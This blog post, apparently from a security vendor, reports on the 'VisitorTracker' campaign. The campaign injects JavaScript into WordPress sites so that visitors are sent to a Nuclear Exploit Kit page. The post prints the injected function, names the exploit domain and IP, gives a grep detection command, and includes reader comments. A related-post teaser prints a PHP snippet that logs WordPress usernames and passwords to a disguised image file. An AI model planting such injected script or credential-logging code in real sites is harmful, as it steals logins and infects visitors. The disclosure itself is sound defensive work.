WordPress Malware – Active VisitorTracker Campaign

We are seeing a large number of WordPress sites compromised with the “visitorTracker_isMob” malware code. This campaign started 15 days ago, but only in the last few days have we started to see it gain traction; really affecting a large number of sites.

Here is a quick snapshot of what we’re seeing with the infection rates over the past two weeks, but the most interesting trend is over the past 48 hours, as it has grown significantly. These are the daily infection rates:

Sucuri-VisitorTracker-Malware-Campaign-II

We initially shared our thoughts on it via our SucuriLabs Notes, but as the campaign has evolved we have been able to decipher more information as we investigate the affects on more compromised sites. This post should serve as a resource to help WordPress administrators (i.e., webmasters) in the WordPress community.

Technical Description

This malware campaign is interesting, its final goal is to use as many compromised websites as possible to redirect all their visitors to a Nuclear Exploit Kit landing page. These landing pages will try a wide variety of available browser exploits to infect the computers of unsuspecting visitors.

If you think about it, the compromised websites are just means for the criminals to get access to as many endpoint desktops as they can. What’s the easiest way to reach out to endpoints? Websites, of course.

This malware campaign adds the following code to all javascript files on the site:

function visitorTracker_isMob( ){
var ua = window.navigator.userAgent.toLowerCase();
if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|mi..|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc .. |vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(ua.substr(0,4))) {
return true;
return false;
} /* .. visitorTracker .. */ /*

Which interacts with a secondary backdoor inside the site to force the browser to load a malicious iframe from one of their Nuclear Exploit Kit landing pages. The current landing page is pointing to vovagandon.tk (193.169.244.159), but that domain changes very often.

We named this malware campaign “VisitorTracker“, because of the function name used in all injected javascript files: visitorTracker_isMob().

At the network level, here is what you would see when visiting a compromised site (thanks to Jerome Segura from MalwareBytes for sharing this with us):

nuclear-ek-coverity

In this case, a large security provider (Coverity) has their site hacked and you can see the iframe being loaded and the browser connecting being sent to the exploit kit landing page at vovagandon.tk. We already reached out to Coverity about the issue, and they should be addressing it soon.

Protect your sites!

We detected thousands of sites compromised with this malware just today and 95% of them are using WordPress. We do not have a specific entry point determined yet, but it seems to be a campaign targeting latest vulnerabilities in plugins. Out of all the sites we detected to be compromised, 17% of them already got blacklisted by Google and other popular blacklists.

If you are a WordPress user, make sure you keep all your plugins updated, including premium ones. I also recommend checking your site via our Free Security / Malware Scanner (SiteCheck) to verify if you’re currently being affected by this campaign. If you’re a system administrator and have access to your server you can use the following command (grep) to search for the infection on your files:

grep -r “visitorTracker_isMob” /var/www/

Once identified, we recommend you proceed with removing the infection and looking for any other indicators of compromise. If you need professional response, our team is standing by to assist.

12 comments
  1. To be growing that quickly it must be targeting very popular plugins. Or there are just that many websites with vulnerable plugins – which seems odd considering that they weren’t already hacked.

  2. I am not a linux expert, but have access to my servers, /var/www/ is the path to the websites, correct? So if I am using somethign different I would want to change?

    1. Yes, that’s just an example if /var/www/ is where your sites are located (default on many linux distros). If you use cpanel, the sites would be inside /home/USERDIR/public_html, so you have to search there.

  3. We found same thing couple of weeks ago in many websites. We also found at the same time thousands of .html files with a size of 30 mb or larger. Please check your root directory and update all your plugins regularly.

  4. Thanks a Lot for the command to scan the server. Pretty quick solution to manage different server with more than 500+ websites each.
    ” grep -r “visitorTracker_isMob” /var/www/ “

  5. I’ve been seeing this infection a lot on our sites lately. Any idea what plugin it’s exploiting to infect the site?

    My hunch is gravity forms, since all exploited sites on our end had that plugin and it wasn’t updated to the latest version. Moreover, many infected files were found in the gravity forms uploads directory, but I’m not sure.

  6. I don’t recall the _isMob but had 5 visitorTacker infected sites last week. They also added a ‘nice’ Hacked by Isis or some aka index file. They added code to all themes’ header & footers, wp-blog-header.php in core, JS files for several popular & not so popular plugins including jetpack. If you use Wordfence, you can save a lot of time searching for the files.

  7. i removed this two three times using grep command, but the infection keeps coming , can anyone suggest some permanent solution to this?

    1. The grep command only locates the string you’re searching for. it doesn’t remove anything.

  8. I am using cpanel in my website and how to search “visitorTracker_isMob” in cpanel hosted website (public_html) any help for windows user?

Comments are closed.

You May Also Like

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post